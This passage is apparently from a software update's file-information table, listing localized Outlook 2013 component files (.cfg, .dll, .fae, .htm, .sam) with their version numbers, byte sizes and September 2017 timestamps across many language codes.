13-Sep-17| 05:26 \nactivity.cfg_1066| activity.cfg| | 1012| 13-Sep-17| 05:26 \ndistlist.cfg_1066| distlist.cfg| | 822| 13-Sep-17| 05:26 \ndoc.cfg_1066| doc.cfg| | 775| 13-Sep-17| 05:26 \nenvelopr.dll_1066| envelopr.dll| 15.0.4481.1000| 19048| 13-Sep-17| 05:26 \nmapir.dll_1066| mapir.dll| 15.0.4875.1000| 1280224| 13-Sep-17| 05:26 \nnote.cfg_1066| note.cfg| | 782| 13-Sep-17| 05:26 \noutllibr.dll_1066| outllibr.dll| 15.0.4949.1000| 7932136| 13-Sep-17| 05:26 \noutlwvw.dll_1066| outlwvw.dll| 15.0.4420.1017| 125552| 13-Sep-17| 05:26 \nactivity.cfg_2052| activity.cfg| | 921| 13-Sep-17| 05:26 \nappt.cfg_2052| appt.cfg| | 756| 13-Sep-17| 05:26 \ncnfnot.cfg_2052| cnfnot.cfg| | 278| 13-Sep-17| 05:26 \ncnfres.cfg_2052| cnfres.cfg| | 293| 13-Sep-17| 05:26 \ncontact.cfg_2052| contact.cfg| | 762| 13-Sep-17| 05:26 \ncurrency.htm_2052| currency.htm| | 583| 13-Sep-17| 05:26 \ndadshirt.htm_2052| dadshirt.htm| | 578| 13-Sep-17| 05:26 \ndistlist.cfg_2052| distlist.cfg| | 781| 13-Sep-17| 05:26 \ndoc.cfg_2052| doc.cfg| | 745| 13-Sep-17| 05:26 \nenvelopr.dll_2052| envelopr.dll| 15.0.4442.1000| 17048| 13-Sep-17| 05:26 \nexitem.cfg_2052| exitem.cfg| | 801| 13-Sep-17| 05:26 \nfaxext.ecf_2052| faxext.ecf| | 824| 13-Sep-17| 05:26 \ninfomail.cfg_2052| infomail.cfg| | 607| 13-Sep-17| 05:26 \nipm.cfg_2052| ipm.cfg| | 758| 13-Sep-17| 05:26 \njudgesch.htm_2052| judgesch.htm| | 572| 13-Sep-17| 05:26 \njungle.htm_2052| jungle.htm| | 576| 13-Sep-17| 05:26 \nmapir.dll_2052| mapir.dll| 15.0.4875.1000| 1109216| 13-Sep-17| 05:26 \nmsspc.ecf_2052| msspc.ecf| | 780| 13-Sep-17| 05:26 \nnote.cfg_2052| note.cfg| | 753| 13-Sep-17| 05:26 \nnotebook.htm_2052| notebook.htm| | 546| 13-Sep-17| 05:26 \noffisupp.htm_2052| offisupp.htm| | 534| 13-Sep-17| 05:26 \nooftmpl.cfg_2052| ooftmpl.cfg| | 785| 13-Sep-17| 05:26 \noutex.ecf_2052| outex.ecf| | 1911| 13-Sep-17| 05:26 \noutex2.ecf_2052| outex2.ecf| | 831| 13-Sep-17| 05:26 \noutllibr.dll_2052| outllibr.dll| 15.0.4949.1000| 7430376| 13-Sep-17| 05:26 \noutlperf.ini_1152| outlperf.ini| | 4712| | \noutlperf.ini_2052| outlperf.ini| | 4712| 13-Sep-17| 05:26 \noutlwvw.dll_2052| outlwvw.dll| 15.0.4442.1000| 125552| 13-Sep-17| 05:26 \npawprint.htm_2052| pawprint.htm| | 529| 13-Sep-17| 05:26 \npinelumb.htm_2052| pinelumb.htm| | 552| 13-Sep-17| 05:26 \npmailext.ecf_2052| pmailext.ecf| | 619| 13-Sep-17| 05:26 \npost.cfg_2052| post.cfg| | 753| 13-Sep-17| 05:26 \npostit.cfg_2052| postit.cfg| | 759| 13-Sep-17| 05:26 \nrclrpt.cfg_2052| rclrpt.cfg| | 774| 13-Sep-17| 05:26 \nrecall.cfg_2052| rec.cfg| | 1148| 13-Sep-17| 05:26 \nremote.cfg_2052| remote.cfg| | 757| 13-Sep-17| 05:26 \nrepltmpl.cfg_2052| repltmpl.cfg| | 795| 13-Sep-17| 05:26 \nreport.cfg_2052| report.cfg| | 755| 13-Sep-17| 05:26 \nresend.cfg_2052| resend.cfg| | 763| 13-Sep-17| 05:26 \nrssitem.cfg_2052| rssitem.cfg| | 768| 13-Sep-17| 05:26 \nschdcncl.cfg_2052| schdcncl.cfg| | 780| 13-Sep-17| 05:26 \nschdreq.cfg_2052| schdreq.cfg| | 1139| 13-Sep-17| 05:26 \nschdresn.cfg_2052| schdresn.cfg| | 792| 13-Sep-17| 05:26 \nschdresp.cfg_2052| schdresp.cfg| | 792| 13-Sep-17| 05:26 \nschdrest.cfg_2052| schdrest.cfg| | 793| 13-Sep-17| 05:26 \nseamarbl.htm_2052| seamarbl.htm| | 572| 13-Sep-17| 05:26 \nsecrec.cfg_2052| secrec.cfg| | 621| 13-Sep-17| 05:26 \nsecure.cfg_2052| secure.cfg| | 607| 13-Sep-17| 05:26 \nsharing.cfg_2052| sharing.cfg| | 754| 13-Sep-17| 05:26 \nsign.cfg_2052| sign.cfg| | 620| 13-Sep-17| 05:26 \nsmimee.cfg_2052| smimee.cfg| | 605| 13-Sep-17| 05:26 \nsmimes.cfg_2052| smimes.cfg| | 636| 13-Sep-17| 05:26 \ntask.cfg_2052| task.cfg| | 749| 13-Sep-17| 05:26 \ntaskacc.cfg_2052| taskacc.cfg| | 777| 13-Sep-17| 05:26 \ntaskdec.cfg_2052| taskdec.cfg| | 778| 13-Sep-17| 05:26 \ntaskreq.cfg_2052| taskreq.cfg| | 770| 13-Sep-17| 05:26 \ntaskupd.cfg_2052| taskupd.cfg| | 781| 13-Sep-17| 05:26 \ntechtool.htm_2052| techtool.htm| | 537| 13-Sep-17| 05:26 \nactivity.cfg_1028| activity.cfg| | 923| 13-Sep-17| 05:26 \nappt.cfg_1028| appt.cfg| | 756| 13-Sep-17| 05:26 \ncnfnot.cfg_1028| cnfnot.cfg| | 278| 13-Sep-17| 05:26 \ncnfres.cfg_1028| cnfres.cfg| | 293| 13-Sep-17| 05:26 \ncontact.cfg_1028| contact.cfg| | 762| 13-Sep-17| 05:26 \ncurrency.htm_1028| currency.htm| | 589| 13-Sep-17| 05:26 \ndadshirt.htm_1028| dadshirt.htm| | 582| 13-Sep-17| 05:26 \ndistlist.cfg_1028| distlist.cfg| | 781| 13-Sep-17| 05:26 \ndoc.cfg_1028| doc.cfg| | 745| 13-Sep-17| 05:26 \nenvelopr.dll_1028| envelopr.dll| 15.0.4442.1000| 17576| 13-Sep-17| 05:26 \nexitem.cfg_1028| exitem.cfg| | 803| 13-Sep-17| 05:26 \nfaxext.ecf_1028| faxext.ecf| | 828| 13-Sep-17| 05:26 \ninfomail.cfg_1028| infomail.cfg| | 601| 13-Sep-17| 05:26 \nipm.cfg_1028| ipm.cfg| | 762| 13-Sep-17| 05:26 \njudgesch.htm_1028| judgesch.htm| | 578| 13-Sep-17| 05:26 \njungle.htm_1028| jungle.htm| | 582| 13-Sep-17| 05:26 \nmapir.dll_1028| mapir.dll| 15.0.4875.1000| 1112288| 13-Sep-17| 05:26 \nmsspc.ecf_1028| msspc.ecf| | 778| 13-Sep-17| 05:26 \nnote.cfg_1028| note.cfg| | 753| 13-Sep-17| 05:26 \nnotebook.htm_1028| notebook.htm| | 552| 13-Sep-17| 05:26 \noffisupp.htm_1028| offisupp.htm| | 540| 13-Sep-17| 05:26 \nooftmpl.cfg_1028| ooftmpl.cfg| | 785| 13-Sep-17| 05:26 \noutex.ecf_1028| outex.ecf| | 1915| 13-Sep-17| 05:26 \noutex2.ecf_1028| outex2.ecf| | 835| 13-Sep-17| 05:26 \noutllibr.dll_1028| outllibr.dll| 15.0.4949.1000| 7428328| 13-Sep-17| 05:26 \noutlperf.ini_1028| outlperf.ini| | 4725| 13-Sep-17| 05:26 \noutlwvw.dll_1028| outlwvw.dll| 15.0.4442.1000| 126080| 13-Sep-17| 05:26 \npawprint.htm_1028| pawprint.htm| | 535| 13-Sep-17| 05:26 \npinelumb.htm_1028| pinelumb.htm| | 558| 13-Sep-17| 05:26 \npmailext.ecf_1028| pmailext.ecf| | 619| 13-Sep-17| 05:26 \npost.cfg_1028| post.cfg| | 753| 13-Sep-17| 05:26 \npostit.cfg_1028| postit.cfg| | 759| 13-Sep-17| 05:26 \nrclrpt.cfg_1028| rclrpt.cfg| | 776| 13-Sep-17| 05:26 \nrecall.cfg_1028| rec.cfg| | 1148| 13-Sep-17| 05:26 \nremote.cfg_1028| remote.cfg| | 757| 13-Sep-17| 05:26 \nrepltmpl.cfg_1028| repltmpl.cfg| | 795| 13-Sep-17| 05:26 \nreport.cfg_1028| report.cfg| | 755| 13-Sep-17| 05:26 \nresend.cfg_1028| resend.cfg| | 763| 13-Sep-17| 05:26 \nrssitem.cfg_1028| rssitem.cfg| | 764| 13-Sep-17| 05:26 \nschdcncl.cfg_1028| schdcncl.cfg| | 786| 13-Sep-17| 05:26 \nschdreq.cfg_1028| schdreq.cfg| | 1141| 13-Sep-17| 05:26 \nschdresn.cfg_1028| schdresn.cfg| | 794| 13-Sep-17| 05:26 \nschdresp.cfg_1028| schdresp.cfg| | 794| 13-Sep-17| 05:26 \nschdrest.cfg_1028| schdrest.cfg| | 795| 13-Sep-17| 05:26 \nseamarbl.htm_1028| seamarbl.htm| | 578| 13-Sep-17| 05:26 \nsecrec.cfg_1028| secrec.cfg| | 625| 13-Sep-17| 05:26 \nsecure.cfg_1028| secure.cfg| | 611| 13-Sep-17| 05:26 \nsharing.cfg_1028| sharing.cfg| | 750| 13-Sep-17| 05:26 \nsign.cfg_1028| sign.cfg| | 618| 13-Sep-17| 05:26 \nsmimee.cfg_1028| smimee.cfg| | 609| 13-Sep-17| 05:26 \nsmimes.cfg_1028| smimes.cfg| | 631| 13-Sep-17| 05:26 \ntask.cfg_1028| task.cfg| | 749| 13-Sep-17| 05:26 \ntaskacc.cfg_1028| taskacc.cfg| | 783| 13-Sep-17| 05:26 \ntaskdec.cfg_1028| taskdec.cfg| | 780| 13-Sep-17| 05:26 \ntaskreq.cfg_1028| taskreq.cfg| | 770| 13-Sep-17| 05:26 \ntaskupd.cfg_1028| taskupd.cfg| | 779| 13-Sep-17| 05:26 \ntechtool.htm_1028| techtool.htm| | 545| 13-Sep-17| 05:26 \ndelimr.fae_1025| delimr.fae| | 10432| 13-Sep-17| 05:24 \nlocaldv.dll_1025| localdv.dll| 15.0.4442.1000| 34976| 13-Sep-17| 05:24 \noladdr.fae_1025| oladdr.fae| | 14544| 13-Sep-17| 05:24 \nolapptr.fae_1025| olapptr.fae| | 11976| 13-Sep-17| 05:24 \noljrnlr.fae_1025| oljrnlr.fae| | 10944| 13-Sep-17| 05:24 \nolmailr.fae_1025| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolnoter.fae_1025| olnoter.fae| | 10424| 13-Sep-17| 05:24 \noltaskr.fae_1025| oltaskr.fae| | 11472| 13-Sep-17| 05:24 \ntransmrr.dll_1025| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:24 \noltaskr.fae_1029| oltaskr.fae| | 11472| 13-Sep-17| 05:24 \ntransmrr.dll_1030| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \ndelimr.fae_1031| delimr.fae| | 10416| 13-Sep-17| 05:24 \nlocaldv.dll_1031| localdv.dll| 15.0.4442.1000| 43664| 13-Sep-17| 05:24 \noladdr.fae_1031| oladdr.fae| | 15056| 13-Sep-17| 05:24 \nolapptr.fae_1031| olapptr.fae| | 12488| 13-Sep-17| 05:24 \noljrnlr.fae_1031| oljrnlr.fae| | 10960| 13-Sep-17| 05:24 \nolmailr.fae_1031| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolnoter.fae_1031| olnoter.fae| | 10448| 13-Sep-17| 05:24 \nolr.sam_1031| olr.sam| | 14512| 13-Sep-17| 05:24 \noltaskr.fae_1031| oltaskr.fae| | 11472| 13-Sep-17| 05:24 \ntransmrr.dll_1031| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \nolmailr.fae_1032| olmailr.fae| | 11504| 13-Sep-17| 05:24 \noltaskr.fae_1032| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \ndelimr.fae_1027| delimr.fae| | 10928| | \ndelimr.fae_1069| delimr.fae| | 10928| | \ndelimr.fae_1110| delimr.fae| | 10928| | \ndelimr.fae_1158| delimr.fae| | 10928| | \ndelimr.fae_2051| delimr.fae| | 10928| | \ndelimr.fae_3082| delimr.fae| | 10928| 13-Sep-17| 05:24 \ndelimr.fae_3179| delimr.fae| | 10928| | \nlocaldv.dll_1027| localdv.dll| 15.0.4442.1000| 40592| | \nlocaldv.dll_1069| localdv.dll| 15.0.4442.1000| 40592| | \nlocaldv.dll_1110| localdv.dll| 15.0.4442.1000| 40592| | \nlocaldv.dll_1158| localdv.dll| 15.0.4442.1000| 40592| | \nlocaldv.dll_2051| localdv.dll| 15.0.4442.1000| 40592| | \nlocaldv.dll_3082| localdv.dll| 15.0.4442.1000| 40592| 13-Sep-17| 05:24 \nlocaldv.dll_3179| localdv.dll| 15.0.4442.1000| 40592| | \noladdr.fae_1027| oladdr.fae| | 15040| | \noladdr.fae_1069| oladdr.fae| | 15040| | \noladdr.fae_1110| oladdr.fae| | 15040| | \noladdr.fae_1158| oladdr.fae| | 15040| | \noladdr.fae_2051| oladdr.fae| | 15040| | \noladdr.fae_3082| oladdr.fae| | 15040| 13-Sep-17| 05:24 \noladdr.fae_3179| oladdr.fae| | 15040| | \nolapptr.fae_1027| olapptr.fae| | 11976| | \nolapptr.fae_1069| olapptr.fae| | 11976| | \nolapptr.fae_1110| olapptr.fae| | 11976| | \nolapptr.fae_1158| olapptr.fae| | 11976| | \nolapptr.fae_2051| olapptr.fae| | 11976| | \nolapptr.fae_3082| olapptr.fae| | 11976| 13-Sep-17| 05:24 \nolapptr.fae_3179| olapptr.fae| | 11976| | \noljrnlr.fae_1027| oljrnlr.fae| | 10960| | \noljrnlr.fae_1069| oljrnlr.fae| | 10960| | \noljrnlr.fae_1110| oljrnlr.fae| | 10960| | \noljrnlr.fae_1158| oljrnlr.fae| | 10960| | \noljrnlr.fae_2051| oljrnlr.fae| | 10960| | \noljrnlr.fae_3082| oljrnlr.fae| | 10960| 13-Sep-17| 05:24 \noljrnlr.fae_3179| oljrnlr.fae| | 10960| | \nolmailr.fae_1027| olmailr.fae| | 10936| | \nolmailr.fae_1069| olmailr.fae| | 10936| | \nolmailr.fae_1110| olmailr.fae| | 10936| | \nolmailr.fae_1158| olmailr.fae| | 10936| | \nolmailr.fae_2051| olmailr.fae| | 10936| | \nolmailr.fae_3082| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolmailr.fae_3179| olmailr.fae| | 10936| | \nolnoter.fae_1027| olnoter.fae| | 10424| | \nolnoter.fae_1069| olnoter.fae| | 10424| | \nolnoter.fae_1110| olnoter.fae| | 10424| | \nolnoter.fae_1158| olnoter.fae| | 10424| | \nolnoter.fae_2051| olnoter.fae| | 10424| | \nolnoter.fae_3082| olnoter.fae| | 10424| 13-Sep-17| 05:24 \nolnoter.fae_3179| olnoter.fae| | 10424| | \nolr.sam_1027| olr.sam| | 14496| | \nolr.sam_1069| olr.sam| | 14496| | \nolr.sam_1110| olr.sam| | 14496| | \nolr.sam_1158| olr.sam| | 14496| | \nolr.sam_2051| olr.sam| | 14496| | \nolr.sam_3082| olr.sam| | 14496| 13-Sep-17| 05:24 \nolr.sam_3179| olr.sam| | 14496| | \noltaskr.fae_1027| oltaskr.fae| | 11448| | \noltaskr.fae_1069| oltaskr.fae| | 11448| | \noltaskr.fae_1110| oltaskr.fae| | 11448| | \noltaskr.fae_1158| oltaskr.fae| | 11448| | \noltaskr.fae_2051| oltaskr.fae| | 11448| | \noltaskr.fae_3082| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \noltaskr.fae_3179| oltaskr.fae| | 11448| | \ntransmrr.dll_1027| transmrr.dll| 15.0.4442.1000| 16032| | \ntransmrr.dll_1069| transmrr.dll| 15.0.4442.1000| 16032| | \ntransmrr.dll_1110| transmrr.dll| 15.0.4442.1000| 16032| | \ntransmrr.dll_1158| transmrr.dll| 15.0.4442.1000| 16032| | \ntransmrr.dll_2051| transmrr.dll| 15.0.4442.1000| 16032| | \ntransmrr.dll_3082| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:24 \ntransmrr.dll_3179| transmrr.dll| 15.0.4442.1000| 16032| | \ndelimr.fae_1036| delimr.fae| | 10928| 13-Sep-17| 05:24 \ndelimr.fae_1134| delimr.fae| | 10928| | \ndelimr.fae_1160| delimr.fae| | 10928| | \nlocaldv.dll_1036| localdv.dll| 15.0.4442.1000| 43168| 13-Sep-17| 05:24 \nlocaldv.dll_1134| localdv.dll| 15.0.4442.1000| 43168| | \nlocaldv.dll_1160| localdv.dll| 15.0.4442.1000| 43168| | \noladdr.fae_1036| oladdr.fae| | 15568| 13-Sep-17| 05:24 \noladdr.fae_1134| oladdr.fae| | 15568| | \noladdr.fae_1160| oladdr.fae| | 15568| | \nolapptr.fae_1036| olapptr.fae| | 12504| 13-Sep-17| 05:24 \nolapptr.fae_1134| olapptr.fae| | 12504| | \nolapptr.fae_1160| olapptr.fae| | 12504| | \noljrnlr.fae_1036| oljrnlr.fae| | 10944| 13-Sep-17| 05:24 \noljrnlr.fae_1134| oljrnlr.fae| | 10944| | \noljrnlr.fae_1160| oljrnlr.fae| | 10944| | \nolmailr.fae_1036| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolmailr.fae_1134| olmailr.fae| | 10936| | \nolmailr.fae_1160| olmailr.fae| | 10936| | \nolnoter.fae_1036| olnoter.fae| | 10424| 13-Sep-17| 05:24 \nolnoter.fae_1134| olnoter.fae| | 10424| | \nolnoter.fae_1160| olnoter.fae| | 10424| | \nolr.sam_1036| olr.sam| | 14496| 13-Sep-17| 05:24 \nolr.sam_1134| olr.sam| | 14496| | \nolr.sam_1160| olr.sam| | 14496| | \noltaskr.fae_1036| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \noltaskr.fae_1134| oltaskr.fae| | 11448| | \noltaskr.fae_1160| oltaskr.fae| | 11448| | \ntransmrr.dll_1036| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \ntransmrr.dll_1134| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1160| transmrr.dll| 15.0.4442.1000| 16048| | \ndelimr.fae_1037| delimr.fae| | 10928| 13-Sep-17| 05:24 \nlocaldv.dll_1037| localdv.dll| 15.0.4442.1000| 34960| 13-Sep-17| 05:24 \noladdr.fae_1037| oladdr.fae| | 14016| 13-Sep-17| 05:24 \nolapptr.fae_1037| olapptr.fae| | 11976| 13-Sep-17| 05:24 \noljrnlr.fae_1037| oljrnlr.fae| | 10432| 13-Sep-17| 05:24 \nolmailr.fae_1037| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolnoter.fae_1037| olnoter.fae| | 10424| 13-Sep-17| 05:24 \noltaskr.fae_1037| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \ntransmrr.dll_1037| transmrr.dll| 15.0.4442.1000| 15520| 13-Sep-17| 05:24 \nlocaldv.dll_1057| localdv.dll| 15.0.4463.1000| 39008| 13-Sep-17| 05:24 \noladdr.fae_1057| oladdr.fae| | 14488| 13-Sep-17| 05:24 \nolmailr.fae_1057| olmailr.fae| | 10896| 13-Sep-17| 05:24 \noltaskr.fae_1057| oltaskr.fae| | 11472| 13-Sep-17| 05:24 \ndelimr.fae_1040| delimr.fae| | 10944| 13-Sep-17| 05:24 \nlocaldv.dll_1040| localdv.dll| 15.0.4442.1000| 41616| 13-Sep-17| 05:24 \noladdr.fae_1040| oladdr.fae| | 15040| 13-Sep-17| 05:24 \nolapptr.fae_1040| olapptr.fae| | 12488| 13-Sep-17| 05:24 \noljrnlr.fae_1040| oljrnlr.fae| | 10960| 13-Sep-17| 05:24 \nolmailr.fae_1040| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolnoter.fae_1040| olnoter.fae| | 10448| 13-Sep-17| 05:24 \nolr.sam_1040| olr.sam| | 14496| 13-Sep-17| 05:24 \noltaskr.fae_1040| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \ntransmrr.dll_1040| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \ndelimr.fae_1041| delimr.fae| | 10416| 13-Sep-17| 05:24 \nlocaldv.dll_1041| localdv.dll| 15.0.4442.1000| 30880| 13-Sep-17| 05:24 \noladdr.fae_1041| oladdr.fae| | 13008| 13-Sep-17| 05:24 \nolapptr.fae_1041| olapptr.fae| | 11480| 13-Sep-17| 05:24 \noljrnlr.fae_1041| oljrnlr.fae| | 10432| 13-Sep-17| 05:24 \nolmailr.fae_1041| olmailr.fae| | 10960| 13-Sep-17| 05:24 \nolnoter.fae_1041| olnoter.fae| | 10424| 13-Sep-17| 05:24 \nolr.sam_1041| olr.sam| | 14496| 13-Sep-17| 05:24 \noltaskr.fae_1041| oltaskr.fae| | 10936| 13-Sep-17| 05:24 \ntransmrr.dll_1041| transmrr.dll| 15.0.4442.1000| 15520| 13-Sep-17| 05:24 \nlocaldv.dll_1087| localdv.dll| 15.0.4454.1000| 38008| 13-Sep-17| 05:24 \ndelimr.fae_1042| delimr.fae| | 10432| 13-Sep-17| 05:24 \nlocaldv.dll_1042| localdv.dll| 15.0.4442.1000| 28816| 13-Sep-17| 05:24 \noladdr.fae_1042| oladdr.fae| | 12992| 13-Sep-17| 05:24 \nolapptr.fae_1042| olapptr.fae| | 10968| 13-Sep-17| 05:24 \noljrnlr.fae_1042| oljrnlr.fae| | 10432| 13-Sep-17| 05:24 \nolmailr.fae_1042| olmailr.fae| | 10424| 13-Sep-17| 05:24 \nolnoter.fae_1042| olnoter.fae| | 10448| 13-Sep-17| 05:24 \nolr.sam_1042| olr.sam| | 14512| 13-Sep-17| 05:24 \noltaskr.fae_1042| oltaskr.fae| | 10936| 13-Sep-17| 05:24 \ntransmrr.dll_1042| transmrr.dll| 15.0.4442.1000| 15024| 13-Sep-17| 05:24 \nlocaldv.dll_1063| localdv.dll| 15.0.4460.1000| 38520| 13-Sep-17| 05:25 \noladdr.fae_1063| oladdr.fae| | 15096| 13-Sep-17| 05:25 \noladdr.fae_1062| oladdr.fae| | 15016| 13-Sep-17| 05:25 \nolapptr.fae_1062| olapptr.fae| | 11952| 13-Sep-17| 05:25 \noljrnlr.fae_1062| oljrnlr.fae| | 10904| 13-Sep-17| 05:25 \nolmailr.fae_1062| olmailr.fae| | 10896| 13-Sep-17| 05:25 \nolnoter.fae_1062| olnoter.fae| | 10400| 13-Sep-17| 05:25 \noltaskr.fae_1062| oltaskr.fae| | 11408| 13-Sep-17| 05:25 \ntransmrr.dll_1086| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:25 \ndelimr.fae_1043| delimr.fae| | 10928| 13-Sep-17| 05:25 \nlocaldv.dll_1043| localdv.dll| 15.0.4442.1000| 42144| 13-Sep-17| 05:25 \noladdr.fae_1043| oladdr.fae| | 14528| 13-Sep-17| 05:25 \nolapptr.fae_1043| olapptr.fae| | 12504| 13-Sep-17| 05:25 \noljrnlr.fae_1043| oljrnlr.fae| | 10960| 13-Sep-17| 05:25 \nolmailr.fae_1043| olmailr.fae| | 10936| 13-Sep-17| 05:25 \nolnoter.fae_1043| olnoter.fae| | 10448| 13-Sep-17| 05:25 \nolr.sam_1043| olr.sam| | 14496| 13-Sep-17| 05:25 \noltaskr.fae_1043| oltaskr.fae| | 11448| 13-Sep-17| 05:25 \ntransmrr.dll_1043| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:25 \ndelimr.fae_1046| delimr.fae| | 10944| 13-Sep-17| 05:25 \nlocaldv.dll_1046| localdv.dll| 15.0.4442.1000| 40080| 13-Sep-17| 05:25 \noladdr.fae_1046| oladdr.fae| | 15040| 13-Sep-17| 05:25 \nolapptr.fae_1046| olapptr.fae| | 12504| 13-Sep-17| 05:25 \noljrnlr.fae_1046| oljrnlr.fae| | 10944| 13-Sep-17| 05:25 \nolmailr.fae_1046| olmailr.fae| | 10936| 13-Sep-17| 05:25 \nolnoter.fae_1046| olnoter.fae| | 10448| 13-Sep-17| 05:25 \nolr.sam_1046| olr.sam| | 14512| 13-Sep-17| 05:25 \noltaskr.fae_1046| oltaskr.fae| | 11984| 13-Sep-17| 05:25 \ntransmrr.dll_1046| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:25 \nlocaldv.dll_2070| localdv.dll| 15.0.4442.1000| 40608| 13-Sep-17| 05:25 \noladdr.fae_2070| oladdr.fae| | 15552| 13-Sep-17| 05:25 \nolapptr.fae_2070| olapptr.fae| | 12488| 13-Sep-17| 05:25 \noljrnlr.fae_2070| oljrnlr.fae| | 10944| 13-Sep-17| 05:25 \nolmailr.fae_2070| olmailr.fae| | 10936| 13-Sep-17| 05:25 \nolnoter.fae_2070| olnoter.fae| | 10448| 13-Sep-17| 05:25 \noltaskr.fae_2070| oltaskr.fae| | 11448| 13-Sep-17| 05:25 \ntransmrr.dll_1048| transmrr.dll| 15.0.4442.1000| 16032| 13-Sep-17| 05:25 \ndelimr.fae_1049| delimr.fae| | 10928| 13-Sep-17| 05:24 \ndelimr.fae_1059| delimr.fae| | 10928| | \ndelimr.fae_1064| delimr.fae| | 10928| | \ndelimr.fae_1087| delimr.fae| | 10928| 13-Sep-17| 05:24 \ndelimr.fae_1088| delimr.fae| | 10928| | \ndelimr.fae_1090| delimr.fae| | 10928| | \ndelimr.fae_1092| delimr.fae| | 10928| | \ndelimr.fae_1104| delimr.fae| | 10928| | \nlocaldv.dll_1049| localdv.dll| 15.0.4442.1000| 38560| 13-Sep-17| 05:25 \nlocaldv.dll_1059| localdv.dll| 15.0.4442.1000| 38560| | \nlocaldv.dll_1064| localdv.dll| 15.0.4442.1000| 38560| | \nlocaldv.dll_1088| localdv.dll| 15.0.4442.1000| 38560| | \nlocaldv.dll_1090| localdv.dll| 15.0.4442.1000| 38560| | \nlocaldv.dll_1092| localdv.dll| 15.0.4442.1000| 38560| | \nlocaldv.dll_1104| localdv.dll| 15.0.4442.1000| 38560| | \noladdr.fae_1049| oladdr.fae| | 15040| 13-Sep-17| 05:24 \noladdr.fae_1059| oladdr.fae| | 15040| | \noladdr.fae_1064| oladdr.fae| | 15040| | \noladdr.fae_1087| oladdr.fae| | 15040| 13-Sep-17| 05:24 \noladdr.fae_1088| oladdr.fae| | 15040| | \noladdr.fae_1090| oladdr.fae| | 15040| | \noladdr.fae_1092| oladdr.fae| | 15040| | \noladdr.fae_1104| oladdr.fae| | 15040| | \nolapptr.fae_1049| olapptr.fae| | 12488| 13-Sep-17| 05:24 \nolapptr.fae_1059| olapptr.fae| | 12488| | \nolapptr.fae_1064| olapptr.fae| | 12488| | \nolapptr.fae_1087| olapptr.fae| | 12488| 13-Sep-17| 05:24 \nolapptr.fae_1088| olapptr.fae| | 12488| | \nolapptr.fae_1090| olapptr.fae| | 12488| | \nolapptr.fae_1092| olapptr.fae| | 12488| | \nolapptr.fae_1104| olapptr.fae| | 12488| | \noljrnlr.fae_1049| oljrnlr.fae| | 10944| 13-Sep-17| 05:25 \noljrnlr.fae_1059| oljrnlr.fae| | 10944| | \noljrnlr.fae_1064| oljrnlr.fae| | 10944| | \noljrnlr.fae_1088| oljrnlr.fae| | 10944| | \noljrnlr.fae_1090| oljrnlr.fae| | 10944| | \noljrnlr.fae_1092| oljrnlr.fae| | 10944| | \noljrnlr.fae_1104| oljrnlr.fae| | 10944| | \nolmailr.fae_1049| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolmailr.fae_1059| olmailr.fae| | 10936| | \nolmailr.fae_1064| olmailr.fae| | 10936| | \nolmailr.fae_1087| olmailr.fae| | 10936| 13-Sep-17| 05:24 \nolmailr.fae_1088| olmailr.fae| | 10936| | \nolmailr.fae_1090| olmailr.fae| | 10936| | \nolmailr.fae_1092| olmailr.fae| | 10936| | \nolmailr.fae_1104| olmailr.fae| | 10936| | \nolnoter.fae_1049| olnoter.fae| | 10448| 13-Sep-17| 05:24 \nolnoter.fae_1059| olnoter.fae| | 10448| | \nolnoter.fae_1064| olnoter.fae| | 10448| | \nolnoter.fae_1087| olnoter.fae| | 10448| 13-Sep-17| 05:24 \nolnoter.fae_1088| olnoter.fae| | 10448| | \nolnoter.fae_1090| olnoter.fae| | 10448| | \nolnoter.fae_1092| olnoter.fae| | 10448| | \nolnoter.fae_1104| olnoter.fae| | 10448| | \nolr.sam_1049| olr.sam| | 14512| 13-Sep-17| 05:25 \nolr.sam_1059| olr.sam| | 14512| | \nolr.sam_1064| olr.sam| | 14512| | \nolr.sam_1088| olr.sam| | 14512| | \nolr.sam_1090| olr.sam| | 14512| | \nolr.sam_1092| olr.sam| | 14512| | \nolr.sam_1104| olr.sam| | 14512| | \noltaskr.fae_1049| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \noltaskr.fae_1059| oltaskr.fae| | 11448| | \noltaskr.fae_1064| oltaskr.fae| | 11448| | \noltaskr.fae_1087| oltaskr.fae| | 11448| 13-Sep-17| 05:24 \noltaskr.fae_1088| oltaskr.fae| | 11448| | \noltaskr.fae_1090| oltaskr.fae| | 11448| | \noltaskr.fae_1092| oltaskr.fae| | 11448| | \noltaskr.fae_1104| oltaskr.fae| | 11448| | \ntransmrr.dll_1049| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \ntransmrr.dll_1059| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1064| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1087| transmrr.dll| 15.0.4442.1000| 16048| 13-Sep-17| 05:24 \ntransmrr.dll_1088| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1090| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1092| transmrr.dll| 15.0.4442.1000| 16048| | \ntransmrr.dll_1104| transmrr.dll| 15.0.4442.1000| 16048| | \noladdr.fae_1051| oladdr.fae| | 